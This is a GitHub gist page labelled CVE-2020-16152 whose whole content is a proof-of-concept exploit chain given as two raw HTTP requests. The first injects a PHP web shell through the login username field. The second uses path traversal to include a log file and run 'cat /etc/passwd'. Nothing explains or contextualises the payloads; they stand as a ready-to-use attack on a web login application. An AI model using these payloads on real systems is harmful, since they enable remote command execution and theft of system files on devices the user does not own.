Skip to content

Instantly share code, notes, and snippets.

@pikpikcu

pikpikcu/CVE-2020-16152.md

Created March 8, 2021 03:59
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save pikpikcu/854fc83da0e0c28a1d0ebbf8f4c679b4 to your computer and use it in GitHub Desktop.
Save pikpikcu/854fc83da0e0c28a1d0ebbf8f4c679b4 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
CVE-2020-16152.md 
POST /login.php5 HTTP/1.1
Accept: application/json
Connection: close
Content-Length: 100
Content-Type: application/json

{
    "login_auth": 0,
    "miniHiveUI": 1,
    "authselect": "Name/Password",
    "userName": "<?php system($_POST['cmd']); exit(0);?>",
    "password": "a"
}

POST /action.php5?_action=list&debug=true HTTP/1.1
Accept: application/json
Connection: close
Content-Length: 100
Content-Type: application/json

{
    "_page": "a" + "/.."*8 + "/"*4041 + "/tmp/messages",
    "cmd": cat /etc/passwd
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment